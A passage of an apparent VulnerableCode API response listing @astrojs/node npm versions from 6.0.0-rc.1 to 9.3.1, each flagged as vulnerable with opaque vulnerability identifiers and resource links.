                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.0-rc.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843118?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843119?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843120?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843121?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843122?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843123?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843124?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.0-beta.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.0-beta.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843125?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.0-beta.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.0-beta.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843126?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843127?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843128?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843129?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843130?format=api",
            "purl": "pkg:npm/%40astrojs/node@7.0.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@7.0.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843131?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843132?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843133?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843134?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843135?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843136?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843137?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843138?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843139?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.2.6",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.2.6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843140?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.3.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.3.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843141?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.3.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.3.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843142?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.3.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.3.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843143?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.3.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.3.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843144?format=api",
            "purl": "pkg:npm/%40astrojs/node@8.3.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@8.3.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843145?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.0-alpha.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.0-alpha.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843146?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.0-alpha.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.0-alpha.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843147?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.0-beta.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.0-beta.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843148?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.0-beta.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.0-beta.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/74253?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843149?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843150?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843151?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.0.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.0.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843152?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/86140?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.1.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843153?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.1.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843154?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.1.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843155?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.2.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.2.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843156?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.2.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.2.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843157?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.2.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.2.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843158?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.3.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-mu7k-psez-uudf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.3.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843159?format=api",
            "purl": "pkg:npm/%40astrojs/node@9.3.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-b47j-p5et-rfem"
                },
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
